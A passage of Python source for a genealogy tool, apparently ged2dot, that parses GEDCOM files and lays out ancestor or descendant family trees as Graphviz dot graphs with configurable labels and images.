cast\n\n\n# Protocols\n\nclass Renderable:\n # pylint: disable=no-self-use\n def render(self, _out: TextIO) -> None:\n ...\n\n\n# Exceptions\n\nclass NoSuchFamilyException(Exception):\n pass\n\n\nclass NoSuchIndividualException(Exception):\n pass\n\n\n# Model\n\nclass Individual:\n placeholderDir = os.path.dirname(os.path.realpath(__file__))\n \"\"\"An individual is our basic building block, can be part of multiple families (usually two).\"\"\"\n def __init__(self, model: 'Model') -> None:\n self.model = model\n self.iid = \"\"\n self.sex = None # type: Optional[str]\n self.forename = \"\" # John\n self.surname = \"\" # Smith\n self.famc = None # type: Any # str or Family\n self.fams = None # type: Any # str or Family\n self.birt = \"\"\n self.deat = \"\"\n # Horizontal order is ensured by order deps. Any order dep starting from this node?\n # Set to true on first addition, so that we can avoid redundant deps.\n\n def __str__(self) -> str:\n return \"iid: %s, sex: %s, forename: %s, surname: %s: famc: %s, fams: %s, birt: %s, deat: %s\" % (self.iid, self.sex, self.forename, self.surname, self.famc, self.fams, self.birt, self.deat)\n\n def resolve(self) -> None:\n \"\"\"Replaces family reference strings with references to objects.\"\"\"\n self.famc = self.model.get_family(self.famc)\n self.fams = self.model.get_family(self.fams)\n\n def get_full_name(self) -> str:\n \"\"\"Full name of the individual. Only used as comments in the output\n file to ease debugging.\"\"\"\n return \"%s %s\" % (self.forename, self.surname)\n\n def get_label(self) -> str:\n if self.forename:\n forename = self.forename\n else:\n forename = \"\"\n if self.surname:\n surname = self.surname\n else:\n surname = \"\"\n\n if self.model.config.imageFormatCase.lower() == 'lower':\n forename = forename.lower()\n surname = surname.lower()\n elif self.model.config.imageFormatCase.lower() == 'upper':\n forename = forename.upper()\n surname = surname.upper()\n\n path = self.model.config.imageFormat % {\n 'forename': forename,\n 'surname': surname,\n 'gwIndex': self.model.get_individual_gene_web_index(self.iid, self.forename, self.surname),\n 'birt': self.birt\n }\n\n if self.model.config.imageFormatGeneweb:\n import unicodedata\n path = unicodedata.normalize('NFKD', path).encode('ascii', 'ignore').decode('ascii')\n path = path.translate(dict({ord(\"-\"): \"_\"}))\n\n try:\n fullpath = os.path.join(self.model.basedir, path)\n except (UnicodeDecodeError) as ude:\n sys.stderr.write(\"Wrong encoding? %s\\n\" % str(ude))\n fullpath = \"\"\n if os.path.exists(fullpath) and not self.model.config.anonMode:\n picture = fullpath\n else:\n if self.sex:\n sex = self.sex.lower()\n else:\n sex = 'u'\n picture = os.path.join(Individual.placeholderDir, \"placeholder-%s.png\" % sex)\n\n try:\n from PIL import Image # type: ignore # No library stub file for module\n i = Image.open(picture)\n if i.size != (100, 100):\n picture = \"%s.tumbnail.png\" % picture\n if not os.path.exists(picture):\n sys.stderr.write(\"// Scaling picture of %s as it didn't have 100x100 px\\n\" % self.get_full_name())\n i.thumbnail((100, 100), Image.ANTIALIAS)\n i.save(picture, \"PNG\")\n i.close()\n except ImportError:\n pass\n\n format_string = \"\"\n if self.model.config.images:\n format_string = self.model.config.nodeLabelImage\n else:\n format_string = self.model.config.nodeLabelPlain\n if self.model.config.anonMode:\n birt = self.birt\n if len(birt) > 1:\n birt = \"YYYY\"\n deat = self.deat\n if len(deat) > 1:\n deat = \"YYYY\"\n return format_string % {\n 'picture': picture,\n 'surname': self.iid[0],\n 'forename': self.iid[1:],\n 'birt': birt,\n 'deat': deat\n }\n return format_string % {\n 'picture': picture,\n 'surname': surname,\n 'forename': forename,\n 'birt': self.birt,\n 'deat': self.deat\n }\n\n def get_color(self) -> str:\n if self.sex is None:\n sex = 'U'\n else:\n sex = self.sex.upper()\n return {'M': 'blue', 'F': 'pink', 'U': 'black'}[sex]\n\n def get_node(self) -> 'Node':\n return Node(self.iid, '[ shape = box,\\nlabel = %s,\\ncolor = %s,\\npenwidth=%s ]' % (self.get_label(), self.get_color(), self.model.config.nodeBorderWidth))\n\n def set_birt(self, birt: str) -> None:\n if not birt:\n return\n self.birt = birt\n try:\n if time.localtime().tm_year - int(birt) > self.model.config.considerAgeDead:\n if not self.deat:\n self.deat = \"?\"\n except ValueError:\n pass\n\n\nclass Family:\n \"\"\"Family has exactly one wife and husb, 0..* children.\"\"\"\n phCount = 0\n\n def __init__(self, model: 'Model') -> None:\n self.model = model\n self.fid = None # type: Optional[str]\n self.husb = None # type: Any # str or Individual\n self.wife = None # type: Any # str or Individual\n self.chil = [] # type: List[str]\n self.depth = 0\n\n def __str__(self) -> str:\n return \"fid: %s, husb: %s, wife: %s, chil: %s, depth: %s\" % (self.fid, self.husb, self.wife, self.chil, self.depth)\n\n def resolve(self) -> None:\n \"\"\"Replaces individual reference strings with references to objects.\"\"\"\n self.husb = self.model.get_individual(self.husb)\n self.wife = self.model.get_individual(self.wife)\n\n def sort_children(self, filtered_families: List['Family']) -> None:\n \"\"\"Sort children, based on filtered families of the layout.\"\"\"\n def compare_children(x_str: str, y_str: str) -> int:\n # For now just try to produce a traditional \"husb left, wife right\"\n # order, ignore birth date.\n x_obj = self.model.get_individual(x_str)\n if not x_obj:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % x_str)\n\n y_obj = self.model.get_individual(y_str)\n if not y_obj:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % y_str)\n\n if x_obj.sex == \"M\" and x_obj.fams and self.model.get_family(x_obj.fams.fid, filtered_families):\n return 1\n if y_obj.sex == \"M\" and y_obj.fams and self.model.get_family(y_obj.fams.fid, filtered_families):\n return -1\n if x_obj.sex == \"F\" and x_obj.fams and self.model.get_family(x_obj.fams.fid, filtered_families):\n return -1\n if y_obj.sex == \"F\" and y_obj.fams and self.model.get_family(y_obj.fams.fid, filtered_families):\n return 1\n return 0\n self.chil.sort(key=cmp_to_key(compare_children))\n\n def get_husb(self) -> Individual:\n \"\"\"Same as accessing 'husb' directly, except that in case that would be\n None, a placeholder individual is created.\"\"\"\n if not self.husb:\n self.husb = Individual(self.model)\n self.husb.iid = \"PH%d\" % Family.phCount\n Family.phCount += 1\n self.husb.sex = 'M'\n self.husb.forename = \"?\"\n self.husb.surname = \"\"\n self.model.individuals.append(self.husb)\n assert isinstance(self.husb, Individual)\n return self.husb\n\n def get_wife(self) -> Individual:\n \"\"\"Same as get_husb(), but for wifes.\"\"\"\n if not self.wife:\n self.wife = Individual(self.model)\n self.wife.iid = \"PH%d\" % Family.phCount\n Family.phCount += 1\n self.wife.sex = 'F'\n self.wife.forename = \"?\"\n self.wife.surname = \"\"\n self.model.individuals.append(self.wife)\n assert isinstance(self.wife, Individual)\n return self.wife\n\n\nclass Model:\n def __init__(self, config: 'Config') -> None:\n self.config = config\n # List of all individuals.\n self.individuals = [] # type: List[Individual]\n # List of all families.\n self.families = [] # type: List[Family]\n self.basedir = \"\"\n\n def get_individual(self, id_string: str) -> Optional[Individual]:\n for i in self.individuals:\n if i.iid == id_string:\n return i\n return None\n\n def get_individual_gene_web_index(self, search_id: str, forename: str, surname: str) -> int:\n my_list = []\n for i in self.individuals:\n if (i.forename == forename) and (i.surname == surname):\n my_list.append(i.iid)\n my_list.sort()\n return my_list.index(search_id)\n\n def get_family(self, id_string: str, family_set: Optional[List[Family]] = None) -> Optional[Family]:\n if family_set:\n families = family_set\n else:\n families = self.families\n for i in families:\n if i.fid == id_string:\n return i\n return None\n\n def load(self, name: str) -> None:\n self.basedir = os.path.dirname(name)\n inf = open(name, \"rb\")\n GedcomImport(inf, self).load()\n inf.close()\n for individual in self.individuals:\n individual.resolve()\n for family in self.families:\n family.resolve()\n\n def save(self, out: Optional[TextIO]) -> None:\n \"\"\"Save is done by calcularing and rendering the layout on the output.\"\"\"\n if not out:\n out = sys.stdout\n\n # Support multiple layouts.\n layout_name = \"Layout\"\n if self.config.layout:\n layout_name = self.config.layout + layout_name\n layout = globals()[layout_name](self, out)\n else:\n layout = Layout(self, out)\n\n layout.calc()\n layout.render()\n\n @staticmethod\n def escape(string: str) -> str:\n return string.replace(\"-\", \"_\")\n\n\n# Layout (view)\n\nclass Edge(Renderable):\n \"\"\"A graph edge.\"\"\"\n def __init__(self, model: Model, from_node: str, to_node: str, invisible: bool = False, comment: Optional[str] = None) -> None:\n self.from_node = from_node\n self.to_node = to_node\n self.rest = \"\"\n if invisible:\n if model.config.edgeInvisibleRed:\n self.rest += \"[ color = red ]\"\n else:\n self.rest += \"[ style = invis ]\"\n else:\n if not model.config.edgeVisibleDirected:\n self.rest += \"[ arrowhead = none ]\"\n if comment:\n self.rest += \"// %s\" % comment\n\n def render(self, out: TextIO) -> None:\n out.write(\"%s -> %s %s\\n\" % (self.from_node, self.to_node, self.rest))\n\n\nclass Node(Renderable):\n \"\"\"A graph node.\"\"\"\n def __init__(self, id_string: str, rest: str = \"\", point: bool = False, visiblePoint: bool = False, comment: str = \"\") -> None:\n self.node_id = id_string\n self.rest = rest\n if point:\n self.rest += \"[ shape = point, width = 0 ]\"\n elif visiblePoint:\n self.rest += \"[ shape = point ]\"\n if comment:\n self.rest += \" // %s\" % comment\n\n def render(self, out: TextIO) -> None:\n out.write(\"%s %s\\n\" % (self.node_id, self.rest))\n\n\nclass Subgraph:\n \"\"\"A subgraph in the layout, contains edges and nodes.\n The special start node is not part of the elements list and it is at the\n begining. The special end node is the separator between elements what are\n in the subgraph and what are outside of it.\"\"\"\n\n class Start:\n \"\"\"Special start node that acts like a node/edge.\"\"\"\n def __init__(self, name: str) -> None:\n self.name = name\n\n def render(self, out: TextIO) -> None:\n out.write(\"subgraph %s {\\n\" % self.name)\n out.write(\"rank = same\\n\")\n\n class End(Renderable):\n \"\"\"Special end node that acts like a node/edge.\"\"\"\n def render(self, out: TextIO) -> None:\n out.write(\"}\\n\")\n\n def __init__(self, name: str, model: Model) -> None:\n self.name = name\n self.model = model\n self.elements = [] # type: List[Renderable]\n self.start = Subgraph.Start(name)\n\n def prepend(self, element: Renderable) -> None:\n self.elements.insert(0, element)\n\n def append(self, element: Renderable) -> None:\n self.elements.append(element)\n\n def end(self) -> None:\n self.append(Subgraph.End())\n\n def render(self, out: TextIO) -> None:\n self.start.render(out)\n for i in self.elements:\n i.render(out)\n out.write(\"\\n\")\n\n def find_family(self, family: Family) -> Tuple[str, int]:\n \"\"\"Find the wife or husb or a family in this subgraph.\n If any of them are found, return the individual's ID and pos.\"\"\"\n count = 0\n for element in self.elements:\n if element.__class__ == Node:\n node = cast(Node, element)\n if family.wife and node.node_id == family.wife.iid:\n return (family.wife.iid, count)\n if family.husb and node.node_id == family.husb.iid:\n return (family.husb.iid, count)\n count += 1\n return (\"\", 0)\n\n def get_prev_of(self, individual: Individual) -> Optional[Individual]:\n \"\"\"The passed individual follows the returned ID in this subgraph.\"\"\"\n for element in self.elements:\n if element.__class__ == Edge:\n edge = cast(Edge, element)\n if hasattr(individual, 'iid') and edge.to_node == individual.iid:\n return self.model.get_individual(edge.from_node)\n\n return None\n\n\nclass Marriage:\n \"\"\"Kind of a fake node, produced from a family.\"\"\"\n def __init__(self, family: Family) -> None:\n self.family = family\n\n def get_name(self) -> str:\n return \"%sAnd%s\" % (self.family.get_husb().iid, self.family.get_wife().iid)\n\n def get_node(self) -> Node:\n husb = self.family.get_husb().get_full_name()\n wife = self.family.get_wife().get_full_name()\n return Node(self.get_name(), visiblePoint=True, comment=\"%s, %s\" % (husb, wife))\n\n\nclass Layout:\n \"\"\"Generates the graphviz digraph, contains subgraphs.\n The stock layout shows ancestors of a root family.\"\"\"\n def __init__(self, model: Model, out: TextIO) -> None:\n self.model = model\n self.out = out\n self.subgraphs = [] # type: List[Subgraph]\n # List of families, which are directly interesting for us.\n self.filtered_families = [] # type: List[Family]\n\n def append(self, subgraph: Subgraph) -> None:\n self.subgraphs.append(subgraph)\n\n def render(self) -> None:\n self.out.write(\"digraph tree {\\n\")\n self.out.write(\"splines = ortho\\n\")\n for i in self.subgraphs:\n i.render(self.out)\n self.out.write(\"}\\n\")\n\n def get_subgraph(self, id_string: str) -> Optional[Subgraph]:\n for subgraph in self.subgraphs:\n if subgraph.name == id_string:\n return subgraph\n return None\n\n def make_edge(self, from_id: str, to_id: str, invisible: bool = False, comment: Optional[str] = None) -> Edge:\n return Edge(self.model, from_id, to_id, invisible=invisible, comment=comment)\n\n def filter_families(self) -> List[Family]:\n \"\"\"Iterate over all families, find out directly interesting and sibling\n families. Populates filtered_families, returns sibling ones.\"\"\"\n\n family = self.model.get_family(self.model.config.rootFamily)\n if not family:\n raise NoSuchFamilyException(\"Can't find family '%s' in the input file.\" % self.model.config.rootFamily)\n self.filtered_families = [family]\n\n depth = 0\n pendings = [family]\n # List of families, which are interesting for us, as A is in the\n # family, B is in filtered_families, and A is a sibling of B.\n sibling_families = []\n while depth < self.model.config.layoutMaxDepth:\n next_pendings = []\n for pending in pendings:\n children = [] # type: List[str]\n for indi in ('husb', 'wife'):\n if getattr(pending, indi):\n indi_family = getattr(pending, indi).famc\n if indi_family:\n indi_family.depth = depth + 1\n self.filtered_families.append(indi_family)\n next_pendings.append(indi_family)\n children += indi_family.chil\n\n # Also collect children's family.\n if depth < self.model.config.layoutMaxSiblingSpouseDepth + 1:\n # +1, because children are in the previous generation.\n for chil in children:\n individual = self.model.get_individual(chil)\n if not individual:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % chil)\n chil_family = individual.fams\n if not chil_family or self.model.get_family(chil_family.fid, self.filtered_families):\n continue\n chil_family.depth = depth\n sibling_families.append(chil_family)\n pendings = next_pendings\n depth += 1\n\n for i in self.filtered_families:\n i.sort_children(self.filtered_families)\n\n return sibling_families\n\n def build_subgraph(self, depth: int, pending_child_nodes: List[Renderable], descendants: bool = False) -> List[Renderable]:\n \"\"\"Builds a subgraph, that contains the real nodes for a generation.\n This consists of:\n\n 1) Wife / husb of a family that has the matching depth\n 2) Pending children from the previous generation.\n\n Returns pending children for the next subgraph.\"\"\"\n subgraph = Subgraph(self.model.escape(\"Depth%s\" % depth), self.model)\n for child in pending_child_nodes:\n subgraph.append(child)\n pending_child_nodes = []\n\n pending_children_deps = []\n prev_wife = None\n prev_chil = None\n for family in [f for f in self.filtered_families if f.depth == depth]:\n husb = family.get_husb()\n subgraph.append(husb.get_node())\n if prev_wife:\n subgraph.append(self.make_edge(prev_wife.iid, family.husb.iid, invisible=True))\n wife = family.get_wife()\n subgraph.append(wife.get_node())\n prev_wife = family.wife\n marriage = Marriage(family)\n subgraph.append(marriage.get_node())\n subgraph.append(self.make_edge(family.get_husb().iid, marriage.get_name(), comment=family.get_husb().get_full_name()))\n subgraph.append(self.make_edge(marriage.get_name(), family.get_wife().iid, comment=family.get_wife().get_full_name()))\n for family_child in family.chil:\n individual = self.model.get_individual(family_child)\n if individual and family.depth > self.model.config.layoutMaxSiblingDepth and individual.fams not in self.filtered_families:\n continue\n if not individual:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % family_child)\n pending_child_nodes.append(individual.get_node())\n if prev_chil:\n # In case family_child is female and has a husb, then link prev_child to husb,\n # not to family_child.\n handled = False\n family_child_indi = self.model.get_individual(family_child)\n if descendants and family_child_indi.sex == 'F':\n family_child_family = family_child_indi.fams\n if family_child_family and family_child_family.husb:\n pending_child_nodes.append(self.make_edge(prev_chil, family_child_family.husb.iid, invisible=True))\n handled = True\n if not handled:\n pending_child_nodes.append(self.make_edge(prev_chil, family_child, invisible=True))\n prev_chil = family_child\n pending_children_deps.append(self.make_edge(\"%sConnect\" % family_child, family_child, comment=individual.get_full_name()))\n subgraph.end()\n for i in pending_children_deps:\n subgraph.append(i)\n self.append(subgraph)\n return pending_child_nodes\n\n def build_connector_subgraph(self, depth: int) -> None:\n \"\"\"Does the same as build_subgraph(), but deals with connector nodes.\"\"\"\n subgraph = Subgraph(self.model.escape(\"Depth%sConnects\" % depth), self.model)\n pending_deps = []\n prev_child = None\n for family in [f for f in self.filtered_families if f.depth == depth]:\n marriage = Marriage(family)\n children = family.chil[:]\n if not (len(children) % 2 == 1 or not children):\n # If there is no middle child, then insert a fake node here, so\n # marriage can connect to that one.\n half = int(len(children) / 2)\n children.insert(half, marriage.get_name())\n for child in children:\n individual = self.model.get_individual(child)\n if individual:\n if family.depth > self.model.config.layoutMaxSiblingDepth and individual.fams not in self.filtered_families:\n continue\n subgraph.append(Node(\"%sConnect\" % child, point=True, comment=individual.get_full_name()))\n else:\n subgraph.append(Node(\"%sConnect\" % child, point=True))\n\n middle = int(len(children) / 2)\n count = 0\n for child in children:\n individual = self.model.get_individual(child)\n if individual and family.depth > self.model.config.layoutMaxSiblingDepth and individual.fams not in self.filtered_families:\n continue\n if count < middle:\n if not individual:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % child)\n subgraph.append(self.make_edge(\"%sConnect\" % child, \"%sConnect\" % children[count + 1], comment=individual.get_full_name()))\n elif count == middle:\n if individual:\n pending_deps.append(self.make_edge(marriage.get_name(), \"%sConnect\" % child, comment=individual.get_full_name()))\n else:\n pending_deps.append(self.make_edge(marriage.get_name(), \"%sConnect\" % child))\n elif count > middle:\n if not individual:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % child)\n subgraph.append(self.make_edge(\"%sConnect\" % children[count - 1], \"%sConnect\" % child, comment=individual.get_full_name()))\n if prev_child:\n subgraph.append(self.make_edge(\"%sConnect\" % prev_child, \"%sConnect\" % child, invisible=True))\n prev_child = None\n count += 1\n if children:\n prev_child = children[-1]\n subgraph.end()\n for dep in pending_deps:\n subgraph.append(dep)\n self.append(subgraph)\n\n def __add_sibling_spouses(self, family: Family) -> None:\n \"\"\"Add husb and wife from a family to the layout.\"\"\"\n depth = family.depth\n subgraph = self.get_subgraph(self.model.escape(\"Depth%s\" % depth))\n assert subgraph\n existing_indi, existing_pos = subgraph.find_family(family)\n new_indi = None\n if family.wife and existing_indi == family.wife.iid:\n new_indi = family.husb\n else:\n new_indi = family.wife\n if not new_indi:\n # No spouse, probably has children. Ignore for now.\n return\n found = False\n for element in subgraph.elements:\n if existing_indi == family.wife.iid and element.__class__ == Edge and cast(Edge, element).to_node == existing_indi:\n cast(Edge, element).to_node = new_indi.iid\n elif existing_indi == family.husb.iid and element.__class__ == Edge and cast(Edge, element).from_node == existing_indi:\n cast(Edge, element).from_node = new_indi.iid\n found = True\n assert found\n subgraph.elements.insert(existing_pos, new_indi.get_node())\n\n marriage = Marriage(family)\n subgraph.elements.insert(existing_pos, marriage.get_node())\n\n subgraph.append(self.make_edge(family.husb.iid, marriage.get_name(), comment=family.husb.get_full_name()))\n subgraph.append(self.make_edge(marriage.get_name(), family.wife.iid, comment=family.wife.get_full_name()))\n\n def __add_sibling_children(self, family: Family) -> None:\n \"\"\"Add children from a sibling family to the layout.\"\"\"\n depth = family.depth\n\n if depth > self.model.config.layoutMaxSiblingFamilyDepth:\n return\n\n subgraph = self.get_subgraph(self.model.escape(\"Depth%s\" % depth))\n assert subgraph\n prev_parent = subgraph.get_prev_of(family.husb)\n if not prev_parent or not prev_parent.fams or not prev_parent.fams.chil:\n # TODO: handle cousins in this case; handle None prev_parent.fams\n return\n if not prev_parent.fams:\n return\n if not prev_parent.fams.chil:\n sys.stderr.write(\"prev_parent.fams.chil should not be empty?\\n\")\n return\n last_child = prev_parent.fams.chil[-1]\n\n # First, add connect nodes and their deps.\n subgraph_connect = self.get_subgraph(self.model.escape(\"Depth%sConnects\" % depth))\n assert subgraph_connect\n\n marriage = Marriage(family)\n subgraph_connect.prepend(Node(\"%sConnect\" % marriage.get_name(), point=True))\n subgraph_connect.append(self.make_edge(marriage.get_name(), \"%sConnect\" % marriage.get_name()))\n\n children = family.chil[:]\n if not len(children) % 2 == 1:\n # If there is no middle child, then insert a fake node here, so\n # marriage can connect to that one.\n half = int(len(children) / 2)\n children.insert(half, marriage.get_name())\n\n prev_child = last_child\n for chil in children:\n if prev_child not in children:\n subgraph_connect.prepend(self.make_edge(\"%sConnect\" % prev_child, \"%sConnect\" % chil, invisible=True))\n else:\n subgraph_connect.prepend(self.make_edge(\"%sConnect\" % prev_child, \"%sConnect\" % chil))\n subgraph_connect.prepend(Node(\"%sConnect\" % chil, point=True))\n prev_child = chil\n\n # Then, add the real nodes.\n subgraph_child = self.get_subgraph(self.model.escape(\"Depth%s\" % (depth - 1)))\n assert subgraph_child\n prev_child = last_child\n for chil in family.chil:\n subgraph_child.prepend(self.make_edge(prev_child, chil, invisible=True))\n individual = self.model.get_individual(chil)\n if not individual:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % individual)\n subgraph_child.prepend(individual.get_node())\n subgraph_child.append(self.make_edge(\"%sConnect\" % chil, chil))\n prev_child = chil\n\n def calc(self) -> None:\n \"\"\"Tries the arrange nodes on a logical grid. Only logical order is\n defined, the exact positions and sizes are still determined by\n graphviz.\"\"\"\n\n sibling_families = self.filter_families()\n\n # Children from generation N are nodes in the N+1th generation.\n pending_child_nodes = [] # type: List[Renderable]\n for depth in reversed(list(range(-1, self.model.config.layoutMaxDepth + 1))):\n # Draw two subgraphs for each generation. The first contains the real nodes.\n pending_child_nodes = self.build_subgraph(depth, pending_child_nodes)\n # The other contains the connector nodes.\n self.build_connector_subgraph(depth)\n\n # Now add the side-families.\n for family in sibling_families:\n self.__add_sibling_spouses(family)\n\n # Any children to take care of?\n if family.chil:\n self.__add_sibling_children(family)\n\n\nclass DescendantsLayout(Layout):\n \"\"\"A layout that shows all descendants of a root family.\"\"\"\n def filter_families(self) -> List[Family]:\n family = self.model.get_family(self.model.config.rootFamily)\n assert family\n self.filtered_families = [family]\n\n depth = 0\n pendings = [family]\n while depth < self.model.config.layoutMaxDepth:\n next_pendings = []\n for pending in pendings:\n for indi in pending.chil:\n individual = self.model.get_individual(indi)\n assert individual\n indi_family = individual.fams\n if indi_family:\n indi_family.depth = depth + 1\n self.filtered_families.append(indi_family)\n next_pendings.append(indi_family)\n pendings = next_pendings\n depth += 1\n\n return []\n\n def calc(self) -> None:\n self.filter_families()\n\n pending_child_nodes = [] # type: List[Renderable]\n for depth in range(self.model.config.layoutMaxDepth + 1):\n pending_child_nodes = self.build_subgraph(depth, pending_child_nodes, descendants=True)\n self.build_connector_subgraph(depth)\n\n\n# Import filter\n\nclass GedcomImport:\n \"\"\"Builds the model from GEDCOM.\"\"\"\n def __init__(self, inf: BinaryIO, model: Model) -> None:\n self.inf = inf\n self.model = model\n self.indi = None # type: Optional[Individual]\n self.family = None # type: Optional[Family]\n self.in_birt = False\n self.in_deat = False\n\n def load(self) -> None:\n linecount = 0\n\n for i in self.inf.readlines():\n line = i.strip().decode(self.model.config.inputEncoding)\n linecount += 1\n tokens = line.split(' ')\n\n first_token = tokens[0]\n # Ignore UTF-8 BOM, if there is one at the begining of the line.\n if first_token.startswith(\"\\ufeff\"):\n first_token = first_token[1:]\n\n level = int(first_token)\n rest = \" \".join(tokens[1:])\n # try to identify lines with errors\n try:\n if level == 0:\n if self.indi:\n self.model.individuals.append(self.indi)\n self.indi = None\n if self.family:\n self.model.families.append(self.family)\n self.family = None\n\n if rest.startswith(\"@\") and rest.endswith(\"INDI\"):\n id_string = rest[1:-6]\n if id_string not in self.model.config.indiBlacklist:\n self.indi = Individual(self.model)\n self.indi.iid = rest[1:-6]\n elif rest.startswith(\"@\") and rest.endswith(\"FAM\"):\n self.family = Family(self.model)\n self.family.fid = rest[1:-5]\n\n elif level == 1:\n if self.in_birt:\n self.in_birt = False\n elif self.in_deat:\n self.in_deat = False\n\n if rest.startswith(\"SEX\") and self.indi:\n self.indi.sex = rest.split(' ')[1]\n elif rest.startswith(\"NAME\") and self.indi:\n rest = rest[5:]\n tokens = rest.split('/')\n self.indi.forename = tokens[0].strip()\n if len(tokens) > 1:\n self.indi.surname = tokens[1].strip()\n elif rest.startswith(\"FAMC\") and self.indi:\n # Child in multiple families? That's crazy...\n if not self.indi.famc:\n self.indi.famc = rest[6:-1]\n elif rest.startswith(\"FAMS\") and self.indi:\n self.indi.fams = rest[6:-1]\n elif rest.startswith(\"BIRT\"):\n self.in_birt = True\n elif rest.startswith(\"DEAT\"):\n self.in_deat = True\n elif rest.startswith(\"HUSB\") and self.family:\n self.family.husb = rest[6:-1]\n elif rest.startswith(\"WIFE\") and self.family:\n self.family.wife = rest[6:-1]\n elif rest.startswith(\"CHIL\") and self.family:\n id_string = rest[6:-1]\n if id_string not in self.model.config.indiBlacklist:\n self.family.chil.append(rest[6:-1])\n\n elif level == 2:\n if rest.startswith(\"DATE\") and self.indi:\n year = rest.split(' ')[-1]\n if self.in_birt:\n self.indi.set_birt(year)\n elif self.in_deat:\n self.indi.deat = year\n\n # pylint: disable=broad-except\n except Exception as exc:\n sys.stderr.write(\"Encountered parsing error in .ged: \" + str(exc) + \"\\n\")\n sys.stderr.write(\"line (%d): %s\\n\" % (linecount, line))\n sys.exit(1)\n\n# Configuration handling\n\n\nclass Config:\n layoutMaxDepthDefault = '5'\n rootFamilyDefault = 'F1'\n nodeBorderWidthDefault = '1.0'\n nodeLabelImageDefault = '<
%(forename)s
%(surname)s
%(birt)s-%(deat)s
>'\n nodeLabelImageSwappedDefault = '<
%(surname)s
%(forename)s
%(birt)s-%(deat)s
>'\n\n def __init__(self, config_dict: Any) -> None:\n self.config_dict = config_dict\n self.parse()\n\n def parse(self) -> None:\n path = None\n\n if isinstance(self.config_dict, list):\n args = cast(List[str], self.config_dict)\n if args:\n path = args[0]\n else:\n path = \"ged2dotrc\"\n else:\n args = []\n\n self.parser = configparser.RawConfigParser()\n if not path:\n self.parser.read_dict(self.config_dict)\n else:\n self.parser.read(path)\n self.option = {} # type: Dict[str, Any]\n for entry in CONFIG_OPTIONS:\n if entry[1] == 'str':\n self.option[entry[0]] = self.get(entry[0], entry[2])\n elif entry[1] == 'int':\n self.option[entry[0]] = int(self.get(entry[0], entry[2]))\n elif entry[1] == 'bool':\n self.option[entry[0]] = (self.get(entry[0], entry[2]).lower() == \"true\")\n\n @staticmethod\n def usage() -> None:\n sys.stdout.write(\"\\n -- Sample config file below --\\n\")\n sys.stdout.write(\" Un-comment all options where the given default does not fit your needs\\n\")\n sys.stdout.write(\" and either save as \\\"ged2dotrc\\\" or provide the filename as first argument\\n\")\n\n sys.stdout.write(\"\\n--------\\n\")\n sys.stdout.write(\"[ged2dot]\\n\")\n for entry in CONFIG_OPTIONS:\n for i in entry[3].split('\\n'):\n sys.stdout.write(\"#%s\\n\" % i)\n sys.stdout.write(\"#type: %s\\n\" % entry[1])\n sys.stdout.write(\"#%s = %s\\n\\n\" % (entry[0], entry[2]))\n sys.stdout.write(\"--------\\n\")\n\n def __getattr__(self, attr: str) -> Any:\n if attr in self.__dict__:\n return self.__dict__[attr]\n if attr in self.__dict__[\"option\"]:\n return self.__dict__[\"option\"][attr]\n return None\n\n def get(self, what: str, fallback: str = configparser._UNSET) -> str: # type: ignore # This is incompatible with MutableMapping, says configparser.pyi\n return self.parser.get('ged2dot', what, fallback=fallback).split('#')[0]\n\n\n# (name, type, default, description)\nCONFIG_OPTIONS = (\n ('input', 'str', \"test.ged\", \"Input filename (GEDCOM file)\"),\n ('rootFamily', 'str', Config.rootFamilyDefault, \"Starting from family with this identifier\"),\n\n ('considerAgeDead', 'int', \"120\", \"Consider someone dead at this age: put a question mark if death date is missing.\"),\n ('anonMode', 'bool', 'False', \"Anonymous mode: avoid any kind of sensitive data in the output.\"),\n ('images', 'bool', 'True', \"Should the output contain images?\"),\n ('imageFormat', 'str', 'images/%(forename)s %(surname)s %(birt)s.jpg', \"\"\"If images is True: format of the image paths.\nUse a path relative to \\\"input\\\" document here!\nPossible variables: %(forename)s, %(surname)s, %(birt)s and %(gwIndex)s.\nwhere gwIndex is 0 unless there are more individuals with the same forename and surname\"\"\"),\n ('imageFormatCase', 'str', '', \"\"\"Should the filenames (from \\\"imageFormat\\\") be converted?\nPossible values: \\\"\\\" - don't convert\n \\\"upper\\\" - convert all characters to upper case\n \\\"lower\\\" - convert all characters to lower case (use this for geneweb export)\n\"\"\"),\n ('imageFormatGeneweb', 'bool', 'False', \"\"\"Convert some special characters in the imagefilename\nto find pictures of geneweb (also set imageFormatCase to lower for geneweb images)\n\"\"\"),\n\n ('nodeLabelImage', 'str', Config.nodeLabelImageDefault, \"\"\"If images is True: label text of nodes.\nPossible values: %(picture)s, %(surname)s, %(forename)s, %(birt)s and %(deat)s.\"\"\"),\n\n ('nodeLabelPlain', 'str', '\"%(forename)s\\\\n%(surname)s\\\\n%(birt)s-%(deat)s\"', \"\"\"If images is False: label text of nodes.\nPossible values: %(picture)s, %(surname)s, %(forename)s, %(birt)s and %(deat)s.\"\"\"),\n ('nodeBorderWidth', 'str', Config.nodeBorderWidthDefault, \"\"\"The box pencil thickness on individual person boxes. It should resemble a floating point number. Default=1.0\"\"\"),\n\n ('edgeInvisibleRed', 'bool', 'False', \"Invisible edges: red for debugging or really invisible?\"),\n ('edgeVisibleDirected', 'bool', 'False', \"Visible edges: show direction for debugging?\"),\n ('layoutMaxDepth', 'int', Config.layoutMaxDepthDefault, \"Number of ancestor generations to show.\"),\n\n ('layoutMaxSiblingDepth', 'int', Config.layoutMaxDepthDefault, \"Number of ancestor generations, where also siblings are shown.\"),\n ('layoutMaxSiblingSpouseDepth', 'int', Config.layoutMaxDepthDefault, \"Number of ancestor generations, where also sibling spouses are shown.\"),\n ('layoutMaxSiblingFamilyDepth', 'int', '1', \"\"\"Number of anchester generations, where also sibling families are shown.\nIt's 1 by default, as values >= 2 causes edges to overlap each other in general.\"\"\"),\n\n ('indiBlacklist', 'str', '', \"\"\"Comma-sepated list of individual ID's to hide from the output for debugging.\nExample: \\\"P526, P525\\\".\"\"\"),\n\n ('layout', 'str', '', \"Currently supported: \\\"\\\" or Descendants\"),\n\n ('inputEncoding', 'str', 'UTF-8', \"\"\"encoding of the gedcom\nexample \\\"UTF-8\\\" or \\\"ISO 